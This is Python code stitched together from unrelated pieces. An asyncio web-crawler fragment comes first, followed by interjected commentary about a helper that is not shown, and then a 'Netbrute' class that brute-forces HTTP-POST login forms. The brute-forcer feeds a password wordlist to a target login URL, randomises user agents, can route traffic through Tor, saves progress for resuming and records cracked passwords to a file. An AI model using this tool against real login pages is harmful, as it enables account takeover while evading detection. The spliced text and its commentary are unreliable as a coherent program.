links.""" links = set() content_type = None encoding = None body = yield from response.read() if response.status == 200: content_type = response.headers.get('content-type') pdict = {} if content_type: content_type, pdict = cgi.parse_header(content_type) encoding = pdict.get('charset', 'utf-8') if content_type in ('text/html', 'application/xml'): text = yield from response.text() # Replace href with (?:href|src) to follow image links. 
urls = set(re.findall(r'''(?i)href=["']([^\s"'<>]+)''', text)) if urls: LOGGER.info('got %r distinct urls from %r', len(urls), response.url) for url in urls: normalized = urllib.parse.urljoin(response.url, url) defragmented, frag = urllib.parse.urldefrag(normalized) if self.url_allowed(defragmented): links.add(defragmented) stat = FetchStatistic( url=response.url, next_url=None, status=response.status, exception=None, size=len(body), content_type=content_type, encoding=encoding, num_urls=len(links), num_new_urls=len(links - self.seen_urls)) return stat, links @asyncio.coroutine def fetch(self, url, max_redirect): """Fetch one URL.""" tries = 0 exception = None while tries < self.max_tries: try: response = yield from self.session.get( url, allow_redirects=False) if tries > 1: LOGGER.info('try %r for %r success', tries, url) break except aiohttp.ClientError as client_error: LOGGER.info('try %r for %r raised %r', tries, url, client_error) exception = client_error tries += 1 else: # We never broke out of the loop: all tries failed. LOGGER.error('%r failed after %r tries', url, self.max_tries) self.record_statistic(FetchStatistic(url=url, next_url=None, status=None, exception=exception, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) return try: if is_redirect(response): location = response.headers['location'] next_url = urllib.parse.urljoin(url, location) self.record_statistic(FetchStatistic(url=url, next_url=next_url, status=response.status, exception=None, size=0, content_type=None, encoding=None, num_urls=0, num_new_urls=0)) if next_url in self.seen_urls: return if max_redirect > 0: LOGGER.info('redirect to %r from %r', next_url, url) self.add_url(next_url, max_redirect - 1) else: LOGGER.error('redirect limit reached for %r from %r', next_url, url) else: stat, links = yield from self.parse_links(response) self.record_statistic(stat) for link in links.difference(self.seen_urls): self.q.put_nowait((link, self.max_redirect)) self.seen_urls.update(links) finally: yield from response.release() @asyncio.coroutine def work(self): """Process queue items forever.""" try: while True: url, max_redirect = yield from self.q.get() assert url in self.seen_urls yield from self.fetch(url, max_redirect) self.q.task_done() except asyncio.CancelledError: pass def url_allowed(self, url): if self.exclude and re.search(self.exclude, url): return False parts = urllib.parse.urlparse(url) if parts.scheme not in ('http', 'https'): LOGGER.debug('skipping non-http scheme in %r', url) return False host, port = urllib.parse.splitport(parts.netloc) if not self.host_okay(host): LOGGER.debug('skipping non-root host in %r', url) return False return True def add_url(self, url, max_redirect=None): """Add a URL to the queue if not seen before.""" if max_redirect is None: max_redirect = self.max_redirect LOGGER.debug('adding %r %r', url, max_redirect) self.seen_urls.add(url) self.q.put_nowait((url, max_redirect)) @asyncio.coroutine def crawl(self): """Run the crawler until all finished.""" workers = [asyncio.Task(self.work(), loop=self.loop) for _ in range(self.max_tasks)] self.t0 = time.time() yield from self.q.join() self.t1 = time.time() for w in workers: w.cancel()
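In non-strict mode the class defers to a `lenient_host` helper that is not included in the excerpt. Going by the `_host_okay_lenient` docstring ("compares the last two components of the host"), a minimal sketch might be:

def lenient_host(host):
    # Keep only the last two dot-separated components, so
    # 'blog.example.com' and 'www.example.com' map to the same key.
    parts = host.split('.')[-2:]
    return ''.join(parts)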
class Netbrute: """ HTTP-POST BruteForcer """ def __init__(self, loop, pre_url=None, pre_payload=None, target_url=None, login=None, payload_model=None, wordlist=None, error_string=None, tasks=64, tor=None, tor_address=None, debug=None): self.max_tasks = tasks self.queue = Queue() self.pre_url = pre_url self.pre_payload = self._generate_payload_type(pre_payload) self.attack_url = target_url self.login = login self.error_string = [x.strip() for x in error_string.split(',')] self.payload = self._generate_payload_type(payload_model) self.wordlist = wordlist self.found = Event() self.tor_use = tor #self.session = self._generate_new_session(loop) self.debug = debug self.runned_passwords = set() self.old_passwds = set() self.restore_files = [] self.progress_bar = None self.ua = self._prepare_user_agents() self.start_time = time.time() self.last_report_time = time.time() # Statuses set of settings self.loaded_passwords = 0 self.tried_passwords = 0 self.error_passwords = 0 self.max_passwords = 0 # Tor set of settings if self.tor_use is not None and tor_address is not None: ip, port = parse_proxy_address(tor_address) self.tor_address = "http://{0}:{1}".format(ip, port) self.tor_address_string = tor_address # Session set of settings self.session_name = self._generate_session_name() restore_files = self._search_open_sesssion() if restore_files > 0: for file in self.restore_files: if self._load_old_session(file) is True: break else: pass @staticmethod def _prepare_user_agents(): # Load user agents ua = get_user_agents() if not ua: raise Exception("No user agents available") return ua def _load_old_session(self, fn): """ Function to ask user input and decide to use or not to use restore files. This also decompress (if it can) and reads data, storing it inside the main object. :param fn: String => Filename :return: Boolean """ question = input("\n[*] Do you want to load passwords from file '{0}'? [y/N] ".format(os.path.basename(fn))) if question.upper() == "Y": try: # Decompress the data and store it raw with gzip.open(fn, "rb", compresslevel=9) as f: _data = f.read() with open(fn, "wb") as f: f.write(_data) except: # If decompression fails, probably it is not compressed. # So we will open it and read, as it should. with open(fn, "rb") as f: _data = f.read() # Read data from file, decode it from BinaryBuffer to String. lines = [x.decode() for x in _data.split(b"\n")] # Finally, add each line to old_passwords set. for line in lines: if line != "": self.old_passwds.add(line) # Define the session name as the restore file used. 
self.session_name = os.path.basename(fn) return True else: return False def _search_open_sesssion(self): current_dir = os.getcwd() + os.sep for root, dirc, files in os.walk(current_dir): for f in files: if f.endswith(".restore"): file_path = os.path.join(root, f) self.restore_files.append(file_path) return len(self.restore_files) @staticmethod def _generate_session_name(): _id = hex(random.randint(0, 999999)) return "session_{0}.restore".format(_id[2:]) @staticmethod def _generate_payload_type(user_input): """ Function responsible for transforming a String into a Dictionary :param user_input: str :return: d: dict """ d = dict() p = [x.strip() for x in user_input.split(",")] for element in p: key, value = element.split(":") d[key] = value return d @staticmethod def _encode_payload_www(unencoded_payload): """ Function responsible for transforming a dictionary payload into an x-www-form-urlencoded payload :param unencoded_payload: :return: """ pl = str() dict_len = len(unencoded_payload) i = 1 for key in unencoded_payload: if i != dict_len: pl += "{0}={1}&".format(key, unencoded_payload[key]) else: pl += "{0}={1}".format(key, unencoded_payload[key]) i += 1 return pl def _adjust_payload(self, payload, password=None, login=None): """ Creates a copy of the payload supplied by the user, then formats it with attack data. :param password: String :return: tmp_payload: dict """ tmp_payload = copy(payload) for key in tmp_payload: value = tmp_payload[key] if value.upper() == "PASS": # Modify the payload prototype with the queue's password. if password is not None: tmp_payload[key] = password elif value.upper() == "LOGIN": # Modify the payload prototype with the supplied login if login is not None: tmp_payload[key] = login else: continue return tmp_payload @staticmethod def _store_data(fn, data): """ Stores a buffer of data into a file and adds a new line at the end of it. :param fn: String => Filename for a file :param data: String => Data buffer :return: None """ data += "\n" with open(fn, "a") as f: f.write(data) return def _increment_progress_bar(self): """ Check if one second has passed since the last report, then refresh the progress bar with the current attack progress :return: None """ if (time.time() - self.last_report_time) < 1: return self.last_report_time = time.time() self.progress_bar.update((self.max_passwords - self.loaded_passwords) + self.tried_passwords) def _parse_response(self, status, response_url, passwd): """ Parses the response packet based on the HTTP status code and response URL :param status: Integer => HTTP status code :param response_url: String => Request URL response :param passwd: String => Password that originated this response :return: None """ for error_string in self.error_string: if isinstance(response_url, yarl.URL): response_url = response_url.query_string if error_string in response_url: self.tried_passwords += 1 self.runned_passwords.add(passwd) if len(self.runned_passwords) % 100 == 0: [self._store_data(self.session_name, x) for x in self.runned_passwords] self.runned_passwords.clear() return if status == 200: print("\n[+] Password was found: {0}".format(passwd)) print("[*] Response URL: {0}".format(response_url)) self._store_data("correct.pass", passwd) self._store_data("correct.pass", "{0}\n\n".format(self.payload)) self.found.set() return async def pre_page_request(self, session): # Use tor or not if self.tor_use is True: proxy_addr = self.tor_address else: proxy_addr = None # We will always create new headers for you, dear sysadmin...
headers = { "content-type": "application/x-www-form-urlencoded", "User-Agent": random.choice(self.ua), } # Generate the payload custom_payload = self._adjust_payload(self.pre_payload, login=self.login) # Do the first request. async with session.post(self.pre_url, data=self._encode_payload_www(custom_payload), headers=headers, proxy=proxy_addr) as response: status, response_url = response.status, response.url if status == 200: return 0, headers else: return 1, headers async def attack_this(self, session, password, headers=None): """ Perform IO operation for http request :param password: String => Password used in the attack :return: None """ if self.debug: print("Started attack!") # We need a header if not previously; if headers is None: headers = { "content-type": "application/x-www-form-urlencoded", "User-Agent": random.choice(self.ua), } custom_payload = self._adjust_payload(self.payload, password=password) # AsyncTimeout removed since commit c47781f # with async_timeout.timeout(10): if self.tor_use is True: proxy_addr = self.tor_address else: proxy_addr = None async with session.post(self.attack_url, data=self._encode_payload_www(custom_payload), headers=headers, proxy=proxy_addr) as response: status, response_url = response.status, response.url self._parse_response(status, response_url, password) if self.debug is False: self._increment_progress_bar() if self.debug: print("Ended attack! [{0}] - Status: {1} - URL: {2}".format(password, status, response_url)) return def _parse_wordlist(self, iterable): return list(filter(lambda x: x not in self.old_passwds, iterable)) def _read_wordlist(self): tmp_list = [] with open(self.wordlist, "r") as f: for line in f.readlines(): tmp_list.append(line.replace("\n", "")) parsed_list = self._parse_wordlist(tmp_list) for element in parsed_list: self.queue.put_nowait(element) self.max_passwords = len(tmp_list) self.loaded_passwords = len(parsed_list) return len(parsed_list) def _generate_new_session(self, loop): # Create cookie jar jar = aiohttp.CookieJar(unsafe=True) # Adjust session object and tor usage information if self.tor_use is True: #print("[+] Using tor with address {0}\n".format(self.tor_address_string)) conn = get_tor_connector(self.tor_address_string) session = aiohttp.ClientSession(loop=loop, cookie_jar=jar, connector=conn) else: session = aiohttp.ClientSession(loop=loop, cookie_jar=jar) return session @asyncio.coroutine def work(self, loop): while not self.queue.empty(): # Create new aiohttp session session = self._generate_new_session(loop) # Check if password is found and throw queue away if self.found.is_set(): # noinspection PyProtectedMember for _ in range(len(self.queue._queue)): yield from self.queue.get() # Retrieve passwords from queue and test them password = yield from self.queue.get() # Do the request and deal with timeout try: k, headers = yield from self.pre_page_request(session) if k == 0: yield from self.attack_this(session, password, headers=headers) except Exception as e: if self.debug: print("Password '{0}' request timed out.".format(password)) print("Error: {0}\n".format(e)) self.queue.put_nowait(password) pass session.close() self.queue.task_done() @asyncio.coroutine def initiate(self, loop): # Attack preparation phase if self.debug: print("Started initiation!") pass_number = self._read_wordlist() print("\n[*] Program have read {0} passwords.\n".format(pass_number)) # Graphical visualization of attack status self.progress_bar = ProgressBar(widgets= ["Guesses: ", Counter(), "/", str(self.max_passwords), " [", 
Percentage(), "] ", Bar(marker="#"), " ", AdaptiveETA()], maxval=self.max_passwords).start() self.progress_bar.update(self.max_passwords - pass_number) # Now the code to run the tasks and execute the async requests workers = [asyncio.Task(self.work(loop)) for _ in range(self.max_tasks)] yield from self.queue.join() for w in workers: w.cancel() if self.debug: print("Ended initiation!")
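As a design note, the hand-rolled `_encode_payload_www` above builds the same `key=value&key=value` body that the standard library already provides. A minimal equivalent, keeping in mind that `urlencode` also percent-encodes values while the original does not:

import urllib.parse

payload = {'username': 'admin', 'password': 'secret'}
body = urllib.parse.urlencode(payload)
# body == 'username=admin&password=secret', the same shape as _encode_payload_www(payload)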